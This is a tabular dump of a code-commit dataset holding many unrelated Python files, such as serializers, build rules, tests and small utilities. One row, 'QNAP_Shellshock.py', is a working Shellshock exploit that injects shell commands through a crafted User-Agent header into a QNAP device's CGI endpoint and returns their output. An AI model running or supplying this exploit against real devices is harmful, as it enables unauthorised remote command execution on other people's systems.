commit stringlengths 40 40 | subject stringlengths 1 1.49k | old_file stringlengths 4 311 | new_file stringlengths 4 311 | new_contents stringlengths 1 29.8k | old_contents stringlengths 0 9.9k | lang stringclasses 3 values | proba float64 0 1 |
|---|---|---|---|---|---|---|---|
238d031651cb74d0ca9bed9d38cda836049c9c37 | Correct fallback for tag name | src/sentry/api/serializers/models/grouptagkey.py | src/sentry/api/serializers/models/grouptagkey.py | from __future__ import absolute_import
from sentry.api.serializers import Serializer, register
from sentry.models import GroupTagKey, TagKey
@register(GroupTagKey)
class GroupTagKeySerializer(Serializer):
def get_attrs(self, item_list, user):
tag_labels = {
t.key: t.get_label()
for t in TagKey.objects.filter(
project=item_list[0].project,
key__in=[i.key for i in item_list]
)
}
result = {}
for item in item_list:
try:
label = tag_labels[item.key]
except KeyError:
if item.key.startswith('sentry:'):
label = item.key.split('sentry:', 1)[-1]
else:
label = item.key
result[item] = {
'name': label,
}
return result
def serialize(self, obj, attrs, user):
if obj.key.startswith('sentry:'):
key = obj.key.split('sentry:', 1)[-1]
else:
key = obj.key
return {
'name': attrs['name'],
'key': key,
'uniqueValues': obj.values_seen,
}
| from __future__ import absolute_import
from sentry.api.serializers import Serializer, register
from sentry.models import GroupTagKey, TagKey
@register(GroupTagKey)
class GroupTagKeySerializer(Serializer):
def get_attrs(self, item_list, user):
tag_labels = {
t.key: t.get_label()
for t in TagKey.objects.filter(
project=item_list[0].project,
key__in=[i.key for i in item_list]
)
}
result = {}
for item in item_list:
try:
label = tag_labels[item.key]
except KeyError:
label = item.value
result[item] = {
'name': label,
}
return result
def serialize(self, obj, attrs, user):
if obj.key.startswith('sentry:'):
key = obj.key.split('sentry:', 1)[-1]
else:
key = obj.key
return {
'name': attrs['name'],
'key': key,
'uniqueValues': obj.values_seen,
}
| Python | 0.000005 |
bc3495acdc9f53e2fa7d750f3dd7bb53826326e3 | Create csvloader.py | csvloader.py | csvloader.py | import random
import csv
with open('points.csv', 'wb') as csvfile:
writer = csv.writer(csvfile, delimiter=' ',quotechar='|', quoting=csv.QUOTE_MINIMAL)
row = []
for i in range(1000):
row.append(random.randrange(-2000,1000))
row.append(random.randrange(20,1000))
row.append(random.randrange(0,3))
writer.writerow(row)
row = []
| Python | 0.000053 | |
8fe27d56592978a0d2a2e43b07214f982bad2010 | Add intermediate tower 8 | pythonwarrior/towers/intermediate/level_008.py | pythonwarrior/towers/intermediate/level_008.py | # -------
# |@ Ss C>|
# -------
level.description("You discover a satchel of bombs which will help "
"when facing a mob of enemies.")
level.tip("Detonate a bomb when you see a couple enemies ahead of "
"you (warrior.look()). Watch out for your health too.")
level.clue("Calling warrior.look() will return an array of Spaces. If the "
"first two contain enemies, detonate a bomb with "
"warrior.detonate_().")
level.time_bonus(30)
level.size(7, 1)
level.stairs(6, 0)
def add_war_abilities(warrior):
warrior.add_abilities('look', 'detonate_')
level.warrior(0, 0, 'east', func=add_war_abilities)
def add_captive_abilities(unit):
unit.add_abilities('explode_')
unit.abilities_attr['explode_'].time = 9
level.unit('captive', 5, 0, 'west', func=add_captive_abilities)
level.unit('thick_sludge', 2, 0, 'west')
level.unit('sludge', 3, 0, 'west')
| Python | 0.998595 | |
5e9c0961c381dcebe0331c8b0db38794de39300b | Initialize P01_fantasy_game_inventory | books/AutomateTheBoringStuffWithPython/Chapter05/PracticeProjects/P01_fantasy_game_inventory.py | books/AutomateTheBoringStuffWithPython/Chapter05/PracticeProjects/P01_fantasy_game_inventory.py | # This program models a player's inventory from a fantasy game
# You are creating a fantasy video game. The data structure to model the player’s
# inventory will be a dictionary where the keys are string values describing the item
# in the inventory and the value is an integer value detailing how many of that item
# the player has.
#
# For example, the dictionary value
# {'rope': 1, 'torch': 6, 'gold coin': 42, 'dagger': 1, 'arrow': 12}
# means the player has 1 rope, 6 torches, 42 gold coins, and so on.
#
# Write a function named displayInventory() that would take any possible “inventory”
# and display it like the following:
# Inventory:
# 12 arrow
# 42 gold coin
# 1 rope
# 6 torch
# 1 dagger
#
# Total number of items: 62
stuff = {'rope': 1, 'torch': 6, 'gold coin': 42, 'dagger': 1, 'arrow': 12}
def displayInventory(inventory):
print("Inventory:")
item_total = 0
for k, v in inventory.items():
# FILL THIS PART IN
print("Total number of items: " + str(item_total))
displayInventory(stuff)
| Python | 0.000004 | |
b50811f87d10dab0768feed293e239ca98a91538 | fix issue with ptu server and morse topic by correcting and republishing /ptu/state | topic_republisher/scripts/republish_ptu_state.py | topic_republisher/scripts/republish_ptu_state.py | #!/usr/bin/env python
import rospy
from sensor_msgs.msg import JointState
class JointStateRepublisher():
"A class to republish joint state information"
def __init__(self):
rospy.init_node('ptu_state_republisher')
self.pub = rospy.Publisher('/ptu/state', JointState)
rospy.Subscriber("/ptu_state", JointState, self.callback)
rospy.loginfo(rospy.get_name() + " setting up")
def callback(self,data):
rospy.logdebug(rospy.get_name() + ": I heard %s, %s", data.name, data.position)
pan_idx = data.name.index('pan')
tilt_idx = data.name.index('tilt')
js = JointState()
js.header = data.header
js.name.append(data.name[pan_idx])
js.name.append(data.name[tilt_idx])
js.position.append(data.position[pan_idx])
js.position.append(data.position[tilt_idx])
self.pub.publish(js)
if __name__ == '__main__':
republisher = JointStateRepublisher()
rospy.spin()
| Python | 0 | |
007b2d2ce61864e87de368e508fa971864847fc7 | Create findPrimes.py | findPrimes.py | findPrimes.py | # Tyler Witt
# findPrimes.py
# 6.27.14
# ver 1.0
# This function implements the Sieve of Eratosthenes algorithm to find all the prime numbers below lim
def findPrimes(lim):
primes = []
cur = 0
if lim < 2:
return None
for num in range(2, lim + 1):
primes.append(num)
while (primes[cur] ** 2 < lim):
for val in primes:
if val % primes[cur] == 0 and val != primes[cur]:
primes.remove(val)
cur += 1
return (primes)
| Python | 0 | |
80f294e134ef684feb8ac700747a65522edf8758 | add new example in the gallery | examples/plot_kraken.py | examples/plot_kraken.py | """
Kraken module example
=======================
kraken module showing distribution of the most frequent taxons
Please, see :mod:`sequana.kraken` for more information and the
quality_taxon pipeline module or kraken rule.
"""
#This plots a simple taxonomic representation of the output
#of the taxonomic pipeline. A more complete and interactive
#representatino using krona is available when using the
#quality_taxon pipeline in Sequana.
##############################################
# test
from sequana import KrakenContaminant
k = KrakenContaminant("kraken.out", verbose=False)
k.plot(kind='pie')
####################################################
# The input file **kraken.out** is the output of the
# Kraken tool. It is a ste of rows such as those ones::
#
# C HISEQ:426:C5T65ACXX:5:2301:5633:7203 11234 203 0:2 11234:1 0:1 11234:1 0:2 11234:1 0:13 11234:1 0:1 11234:1 0:3 11234:1 0:16 11234:1 0:5 11234:1 0:6 11234:1 0:13 A:31 0:33 11234:1 0:29 11234:1 0:7
# C HISEQ:426:C5T65ACXX:5:2301:5815:7120 11234 203 0:4 11234:1 0:12 11234:1 0:22 11234:1 0:1 0 11234:1 0:5 11234:1 0:7 11234:1 0:5 A:31 0:3 11234:1 0:22 11234:1 0:18 11234:1 0:24 11234:1
#
#
# The KrakenContaminant class will read the file, download a taxonomic database
# from EBI, map the taxon found in the **kraken.out** file and figure out the
# lineage. In the example above, only the scientific name is found. In the
# snakefile provided in Sequana, the full pipeline produces a full lineage
# representation using krona tool.
#
# .. seealso:: :ref:`pipelines`
| Python | 0 | |
341ca75484b4607eb632d52bf257c8190ebf8a3b | Create fishspine3.py | fishspine3.py | fishspine3.py | #Fish vertebral location code
| Python | 0.000005 | |
653ab8128de3c08b6b8be0d662f12ef5a3edf6b2 | Add grafana build rule | shipyard/rules/third-party/grafana/build.py | shipyard/rules/third-party/grafana/build.py | from foreman import get_relpath, rule
from garage import scripts
from templates.common import define_distro_packages
GRAFANA_DEB = 'grafana_5.1.4_amd64.deb'
GRAFANA_DEB_URI = 'https://s3-us-west-2.amazonaws.com/grafana-releases/release/grafana_5.1.4_amd64.deb'
GRAFANA_DEB_CHECKSUM = 'sha256-bbec4cf6112c4c2654b679ae808aaad3b3e4ba39818a6d01f5f19e78946b734e'
define_distro_packages([
'adduser',
'libfontconfig',
])
@rule
@rule.depend('//base:build')
@rule.depend('install_packages')
def build(parameters):
drydock_src = parameters['//base:drydock'] / get_relpath()
scripts.mkdir(drydock_src)
with scripts.directory(drydock_src):
deb_path = drydock_src / GRAFANA_DEB
if not deb_path.exists():
scripts.wget(GRAFANA_DEB_URI, deb_path)
scripts.ensure_checksum(deb_path, GRAFANA_DEB_CHECKSUM)
with scripts.using_sudo():
scripts.execute(['dpkg', '--install', deb_path])
@rule
@rule.depend('build')
@rule.reverse_depend('//base:tapeout')
def tapeout(parameters):
with scripts.using_sudo():
rootfs = parameters['//base:drydock/rootfs']
scripts.rsync(
[
'/usr/sbin/grafana-server',
'/usr/share/grafana',
],
rootfs,
relative=True,
)
@rule
@rule.depend('//base:tapeout')
def trim_usr(parameters):
rootfs = parameters['//base:drydock/rootfs']
with scripts.using_sudo():
scripts.rm(rootfs / 'usr/lib', recursive=True)
scripts.rm(rootfs / 'usr/local/lib', recursive=True)
| Python | 0.000001 | |
1154fe470aaf4066c041b33c66bbfd46d9470b4a | Clean up existing BotTestExpectations unittests in preparation for adding more | Tools/Scripts/webkitpy/layout_tests/layout_package/bot_test_expectations_unittest.py | Tools/Scripts/webkitpy/layout_tests/layout_package/bot_test_expectations_unittest.py | # Copyright (C) 2013 Google Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the Google name nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import unittest2 as unittest
from webkitpy.layout_tests.layout_package import bot_test_expectations
class BotTestExpectationsTest(unittest.TestCase):
# Expects newest result on left of string "PFF", means it just passed after 2 failures.
def _results_from_string(self, results_string):
results_list = []
last_char = None
for char in results_string:
if char != last_char:
results_list.insert(0, [1, char])
else:
results_list[0][0] += 1
return {'results': results_list}
def _assert_expectations(self, expectations, test_data, expectations_string):
output = expectations._generate_expectations_string(test_data)
self.assertMultiLineEqual(output, expectations_string)
def test_basic(self):
test_data = {
'tests': {
'foo': {
'veryflaky.html': self._results_from_string('FPFP'),
'maybeflaky.html': self._results_from_string('PPFP'),
'notflakypass.html': self._results_from_string('PPPP'),
'notflakyfail.html': self._results_from_string('FFFF'),
}
}
}
expectations = bot_test_expectations.BotTestExpectations(only_ignore_very_flaky=True)
self._assert_expectations(expectations, test_data, """Bug(auto) foo/veryflaky.html [ Failure Pass ]""")
expectations = bot_test_expectations.BotTestExpectations(only_ignore_very_flaky=False)
self._assert_expectations(expectations, test_data, """Bug(auto) foo/veryflaky.html [ Failure Pass ]
Bug(auto) foo/maybeflaky.html [ Failure Pass ]""")
def test_all_failure_types(self):
expectations = bot_test_expectations.BotTestExpectations(only_ignore_very_flaky=True)
test_data = {
'tests': {
'foo': {
'allfailures.html': self._results_from_string('FPFPCNCNTXTXIZIZOCOC'),
'imageplustextflake.html': self._results_from_string('ZPZPPPPPPPPPPPPPPPPP'),
}
}
}
self._assert_expectations(expectations, test_data, """Bug(auto) foo/imageplustextflake.html [ Failure Pass ]
Bug(auto) foo/allfailures.html [ Crash Missing ImageOnlyFailure Failure Timeout Pass ]""")
| # Copyright (C) 2013 Google Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the Google name nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import unittest2 as unittest
from webkitpy.layout_tests.layout_package import bot_test_expectations
class BotTestExpectationsTest(unittest.TestCase):
def test_basic(self):
expectations = bot_test_expectations.BotTestExpectations(only_ignore_very_flaky=True)
test_data = {
'tests': {
'foo': {
'veryflaky.html': {
'results': [[1, 'F'], [1, 'P'], [1, 'F'], [1, 'P']]
},
'maybeflaky.html': {
'results': [[3, 'P'], [1, 'F'], [3, 'P']]
},
'notflakypass.html': {
'results': [[4, 'P']]
},
'notflakyfail.html': {
'results': [[4, 'F']]
},
}
}
}
output = expectations._generate_expectations_string(test_data)
expected_output = """Bug(auto) foo/veryflaky.html [ Failure Pass ]"""
self.assertMultiLineEqual(output, expected_output)
expectations = bot_test_expectations.BotTestExpectations(only_ignore_very_flaky=False)
output = expectations._generate_expectations_string(test_data)
expected_output = """Bug(auto) foo/veryflaky.html [ Failure Pass ]
Bug(auto) foo/maybeflaky.html [ Failure Pass ]"""
self.assertMultiLineEqual(output, expected_output)
def test_all_failure_types(self):
expectations = bot_test_expectations.BotTestExpectations(only_ignore_very_flaky=True)
test_data = {
'tests': {
'foo': {
'allfailures.html': {
'results': [[1, 'F'], [1, 'P'], [1, 'F'], [1, 'P'],
[1, 'C'], [1, 'N'], [1, 'C'], [1, 'N'],
[1, 'T'], [1, 'X'], [1, 'T'], [1, 'X'],
[1, 'I'], [1, 'Z'], [1, 'I'], [1, 'Z'],
[1, 'O'], [1, 'C'], [1, 'O'], [1, 'C']]
},
'imageplustextflake.html': {
'results': [[1, 'Z'], [1, 'P'], [1, 'Z'], [1, 'P']]
},
}
}
}
output = expectations._generate_expectations_string(test_data)
expected_output = """Bug(auto) foo/imageplustextflake.html [ Failure Pass ]
Bug(auto) foo/allfailures.html [ Crash Missing ImageOnlyFailure Failure Timeout Pass ]"""
self.assertMultiLineEqual(output, expected_output)
| Python | 0.000001 |
4dd0b349f971cd5ba4842f79a7dba36bf4999b6f | Add Jmol package (#3041) | var/spack/repos/builtin/packages/jmol/package.py | var/spack/repos/builtin/packages/jmol/package.py | ##############################################################################
# Copyright (c) 2013-2016, Lawrence Livermore National Security, LLC.
# Produced at the Lawrence Livermore National Laboratory.
#
# This file is part of Spack.
# Created by Todd Gamblin, tgamblin@llnl.gov, All rights reserved.
# LLNL-CODE-647188
#
# For details, see https://github.com/llnl/spack
# Please also see the LICENSE file for our notice and the LGPL.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License (as
# published by the Free Software Foundation) version 2.1, February 1999.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the IMPLIED WARRANTY OF
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the terms and
# conditions of the GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
##############################################################################
from spack import *
from distutils.dir_util import copy_tree
class Jmol(Package):
"""Jmol: an open-source Java viewer for chemical structures in 3D
with features for chemicals, crystals, materials and biomolecules."""
homepage = "http://jmol.sourceforge.net/"
url = "https://sourceforge.net/projects/jmol/files/Jmol/Version%2014.8/Jmol%2014.8.0/Jmol-14.8.0-binary.tar.gz"
version('14.8.0', '3c9f4004b9e617ea3ea0b78ab32397ea')
depends_on('jdk', type='run')
def install(self, spec, prefix):
copy_tree('jmol-{0}'.format(self.version), prefix)
def setup_environment(self, spack_env, run_env):
run_env.prepend_path('PATH', self.prefix)
run_env.set('JMOL_HOME', self.prefix)
| Python | 0 | |
dc635babcf78343bf9490a77d716db89bda2698b | Create __init__.py | api_1_0/__init__.py | api_1_0/__init__.py | from flask import Blueprint
api = Blueprint('api', __name__)
from . import authentication, posts, users, comments, errors
| Python | 0.000429 | |
7d29c44e19c1f06deb0722a3df51501b39566c4b | Implement simple en/decoding command line tool | flynn/tool.py | flynn/tool.py | # coding: utf-8
import sys
import argparse
import flynn
import json
def main(args=sys.argv[1:]):
formats = {"json", "cbor", "cbori", "cborh", "cborhi"}
argparser = argparse.ArgumentParser()
argparser.add_argument("-i", "--input-format", choices=formats, default="cbor")
argparser.add_argument("-o", "--output-format", choices=formats, default="cbor")
args = argparser.parse_args(args)
if args.input_format in {"cbor", "cbori"}:
input_format = "cbor"
else:
input_format = args.input_format
output_format = args.output_format
intermediate = None
if input_format in {"cbor", "cbori"}:
intermediate = flynn.load(sys.stdin.raw)
elif input_format in {"cborh", "cborhi"}:
intermediate = flynn.loadh(sys.stdin.read())
elif input_format == "json":
intermediate = json.load(sys.stdin)
if output_format == "cbor":
flynn.dump(intermediate, sys.stdout.raw)
elif output_format == "cbori":
flynn.dump(intermediate, sys.stdout.raw, cls=flynn.encoder.InfiniteEncoder)
elif output_format == "cborh":
sys.stdout.write(flynn.dumph(intermediate))
elif output_format == "cborhi":
sys.stdout.write(flynn.dumph(intermediate, cls=flynn.encoder.InfiniteEncoder))
elif output_format == "json":
json.dump(intermediate, sys.stdout)
if __name__ == "__main__":
main()
| Python | 0.000108 | |
5af92f3905f2d0101eeb42ae7cc51bff528ea6ea | Write bodies given by coordinates to a VTK file | syngeo/io.py | syngeo/io.py | # stardard library
import sys, os
# external libraries
import numpy as np
from ray import imio, evaluate
def add_anything(a, b):
return a + b
def write_synapse_to_vtk(neurons, coords, fn, im=None, t=(2,0,1), s=(1,-1,1),
margin=None):
"""Output neuron shapes around pre- and post-synapse coordinates.
The coordinate array is a (n+1) x m array, where n is the number of
post-synaptic sites (fly neurons are polyadic) and m = neurons.ndim, the
number of dimensions of the image.
"""
neuron_ids = neurons[zip(*(coords[:,t]*s))]
synapse_volume = reduce(add_anything,
[(i+1)*(neurons==j) for i, j in enumerate(neuron_ids)])
imio.write_vtk(synapse_volume, fn)
if im is not None:
imio.write_vtk(im,
os.path.join(os.path.dirname(fn), 'image.' + os.path.basename(fn)))
| Python | 0.000001 | |
e6e90cef36551796f7fb06585c67508538ce113f | Create MaxCounters.py | Counting-Elements/MaxCounters.py | Counting-Elements/MaxCounters.py | # https://codility.com/demo/results/trainingTC7JSX-8E9/
def solution(N, A):
counters = N * [0]
max_counters = 0
for elem in A:
if elem == N+1:
counters = N * [max_counters]
else:
this_elem = counters[elem-1] + 1
counters[elem-1] = this_elem
if this_elem > max_counters:
max_counters = this_elem
return counters
| Python | 0 | |
ce1d13bc6827f780e44491b630e64df7b52634f1 | add vibration sensor code | gpio/vibration-sendor-test.py | gpio/vibration-sendor-test.py | import RPi.GPIO as GPIO
import time
import datetime
GPIO.setwarnings(False)
GPIO.setmode(GPIO.BCM)
IN_PIN = 18
LED_PIN = 17
GPIO.setup(IN_PIN, GPIO.IN, pull_up_down=GPIO.PUD_UP)
GPIO.setup(LED_PIN, GPIO.OUT)
GPIO.output(LED_PIN, GPIO.LOW)
def turn_on(led_pin):
GPIO.output(led_pin, GPIO.HIGH)
def turn_off(led_pin):
GPIO.output(led_pin, GPIO.LOW)
count = 0
while True:
i=GPIO.input(IN_PIN)
if(count == 1000):
turn_off(LED_PIN)
count += 1
if i==1:
print(datetime.datetime.now(), "Vibration detected",i)
time.sleep(0.1)
count = 0
turn_on(LED_PIN)
| Python | 0 | |
e7ef1806f84e6d07ef88ca23444f37cf6f50e014 | Add a console-less version. | wxMailServer.pyw | wxMailServer.pyw | # -*- encoding: utf-8 -*-
from wxMailServer import main
if __name__ == "__main__":
main() | Python | 0 | |
b419f8c9f562d3d16a6079e949c47ec2adc4c97d | add utility script for merging test files | scripts/merge-tests.py | scripts/merge-tests.py | import sys
c_includes = set()
cxx_includes = set()
jive_includes = set()
local_includes = set()
code_blocks = []
def mangle(fname):
name = fname[6:-2]
name = name.replace('/', '_')
name = name.replace('-', '_')
return name
for fname in sys.argv[1:]:
seen_includes = False
code_lines = []
name = mangle(fname)
for line in file(fname).readlines():
line = line[:-1]
if line[:9] == "#include ":
include = line[9:]
if include[:6] == "<jive/":
jive_includes.add(include)
elif include[-3:] == ".h>":
c_includes.add(include)
elif include[0] == '"':
local_includes.add(include)
else:
cxx_includes.add(include)
seen_includes = True
continue
if not seen_includes: continue
line = line + '\n'
if line == '\n' and code_lines and code_lines[-1] == '\n':
continue
line = line.replace('test_main', name)
code_lines.append(line)
code_blocks.append(''.join(code_lines))
out = sys.stdout
if local_includes:
for i in sorted(local_includes): out.write('#include %s\n' % i)
out.write('\n')
if c_includes:
for i in sorted(c_includes): out.write('#include %s\n' % i)
out.write('\n')
if cxx_includes:
for i in sorted(cxx_includes): out.write('#include %s\n' % i)
out.write('\n')
if jive_includes:
for i in sorted(jive_includes): out.write('#include %s\n' % i)
out.write('\n')
for c in code_blocks: out.write(c)
| Python | 0 | |
62e17c30ba45458254c0da5b14582aeeac9eab4c | Add command to pre-generate all jpeg images | signbank/video/management/commands/makejpeg.py | signbank/video/management/commands/makejpeg.py | """Convert a video file to flv"""
from django.core.exceptions import ImproperlyConfigured
from django.core.management.base import BaseCommand, CommandError
from django.conf import settings
from signbank.video.models import GlossVideo
import os
class Command(BaseCommand):
help = 'Create JPEG images for all videos'
args = ''
def handle(self, *args, **options):
# just access the poster path for each video
for vid in GlossVideo.objects.all():
p = vid.poster_path()
print p
else:
print "Usage makejpeg"
| Python | 0.000001 | |
83d8199eccf7261a8e2f01f7665537ee31702f8c | Create QNAP_Shellshock.py | QNAP_Shellshock.py | QNAP_Shellshock.py | #!/usr/bin/python
import socket
print "QNAP exploit!"
inputstr=""
ip="x.x.x.x" #Change IP Value
port=8080
while True:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
inputstr=raw_input("cmd> ")
s.connect(ip,port))
s.send("GET /cgi-bin/index.cgi HTTP/1.0\nHost: "+ip+"\nUser-Agent: () { :;}; echo; "+inputstr+"\r\n\r\n")
output=""
while True:
buf=s.recv(4096)
if not buf:
break
output+=buf
indexHTML= output.find("html")
print output[0:indexHTML]
s.close()
| Python | 0.000001 | |
444efa0506034302b605107981b0db4b8d2c37cc | task urls | task/urls.py | task/urls.py | from django.conf.urls import patterns, include, url
from task.views import Home, TaskView, TaskDetail
urlpatterns = patterns(
'',
url(r'^$', Home.as_view(), name='home'),
url(r'^task/$', TaskView.as_view(), name='task'),
url(r'^task/(?P<pk>\d+)/$', TaskDetail.as_view(), name='task_detail'),
)
| Python | 0.999783 | |
63c2c7a696aedb1b08d2478a2b84aec42f4364cf | Add tests for URLConverter | tests/bucket/test_url_converter.py | tests/bucket/test_url_converter.py | from mrs.bucket import URLConverter
def test_local_to_global():
c = URLConverter('myhost', 42, '/my/path')
url = c.local_to_global('/my/path/xyz.txt')
assert url == 'http://myhost:42/xyz.txt'
def test_local_to_global_outside_dir():
c = URLConverter('myhost', 42, '/my/path')
url = c.local_to_global('/other/path/xyz.txt')
assert url == '/other/path/xyz.txt'
def test_global_to_local():
c = URLConverter('myhost', 42, '/my/path')
master = 'server:8080'
url = c.global_to_local('http://myhost:42/xyz.txt', master)
assert url == '/my/path/xyz.txt'
def test_global_to_local_other():
c = URLConverter('myhost', 42, '/my/path')
master = 'server:8080'
url = c.global_to_local('http://other:443/xyz.txt', master)
assert url == 'http://other:443/xyz.txt'
def test_global_to_local_master():
c = URLConverter('myhost', 42, '/my/path')
master = 'server:8080'
url = c.global_to_local('http:///xyz.txt', master)
assert url == 'http://server:8080/xyz.txt'
# vim: et sw=4 sts=4
| Python | 0 | |
88cf8e30da6ab655dfc31b2fd88d26ef649e127d | add sha digest tool | getDigest.py | getDigest.py | #!/usr/bin/env python
# encoding: utf-8
import sys
import hashlib
def getDigest(file):
# BUF_SIZE is totally arbitrary, change for your app!
BUF_SIZE = 65536 # lets read stuff in 64kb chunks!
md5 = hashlib.md5()
sha1 = hashlib.sha1()
with open(file, 'rb') as f:
while True:
data = f.read(BUF_SIZE)
if not data:
break
md5.update(data)
sha1.update(data)
print("MD5: {0}".format(md5.hexdigest()))
print("SHA1: {0}".format(sha1.hexdigest()))
def main(argv):
getDigest(argv)
if __name__ == '__main__':
sys.exit(main(sys.argv[1]))
| Python | 0 | |
e9acbc2e1423084ddd4241e2fbdcc7fcbf02ad6d | add empty migration as data migration | coupons/migrations/0005_auto_20151105_1502.py | coupons/migrations/0005_auto_20151105_1502.py | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('coupons', '0004_auto_20151105_1456'),
]
operations = [
]
| Python | 0.000007 | |
3004dec0e0deadc4df61bafb233cd6b277c9bfef | Add in small utility that creates an index on the MongoDB collection, specifically on the Steam ID number key | util/create_mongodb_index.py | util/create_mongodb_index.py | #!/usr/env python3.4
import sys
from pymongo import ASCENDING
from util.mongodb import connect_to_db
from argparse import (ArgumentParser,
ArgumentDefaultsHelpFormatter)
def main(argv=None):
parser = ArgumentParser(description='Run incremental learning '
'experiments.',
formatter_class=ArgumentDefaultsHelpFormatter,
conflict_handler='resolve')
parser.add_argument('-dbhost', '--mongodb_host',
help='Host that the MongoDB server is running on.',
type=str,
default='localhost')
parser.add_argument('--mongodb_port', '-dbport',
help='Port that the MongoDB server is running on.',
type=int,
default=37017)
args = parser.parse_args()
# Connect to MongoDB database
print('Connecting to MongoDB database at {}:{}...'
.format(args.mongodb_host,
args.mongodb_port),
file=sys.stderr)
db = connect_to_db(args.mongodb_host,
args.mongodb_port)
# Create index on 'steam_id_number' so that cursors can be sorted
# on that particular key
print('Creating index on the "steam_id_number" key...',
file=sys.stderr)
db.create_index('steam_id_number', ASCENDING)
print('Created new index "steam_id_number_1" in reviews '
'collection.',
file=sys.stderr)
| Python | 0 | |
3da9953aa453281fd55ada75b2ed40fce8d9df6c | Create screen_op.py | screen_op.py | screen_op.py | #-------------------------------------------------------------------------------
#
# Controls shed weather station
#
# The MIT License (MIT)
#
# Copyright (c) 2015 William De Freitas
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
#
#-------------------------------------------------------------------------------
#!usr/bin/env python
#===============================================================================
# Import modules
#===============================================================================
import os
import settings as s
#===============================================================================
# DRAW SCREEN
#===============================================================================
def draw_screen(sensors, thingspeak_enable, key, rrd_enable, rrd_set):
os.system('clear')
display_string = []
display_string.append('WEATHER STATION')
display_string.append('')
display_string.append('Next precip. acc. reset at '+ str(s.PRECIP_ACC_RESET_TIME))
#Display thingspeak field data set up
if thingspeak_enable:
display_string.append('')
display_string.append('Thingspeak write api key: '+key)
display_string.append('')
display_string.append('Thingspeak field set up:')
display_string.append(' Field\tName\t\tValue\tUnit')
display_string.append(' ---------------------------------------')
for key, value in sorted(sensors.items(), key=lambda e: e[1][0]):
display_string.append(' ' + str(value[s.TS_FIELD]) + '\t' + key +
'\t' + str(value[s.VALUE]) + '\t' + value[s.UNIT])
#Display RRDtool set up
if rrd_enable:
display_string.append('')
display_string.append('RRDtool set up:')
for i in range(0,len(rrd_set)):
display_string += rrd_set[i]
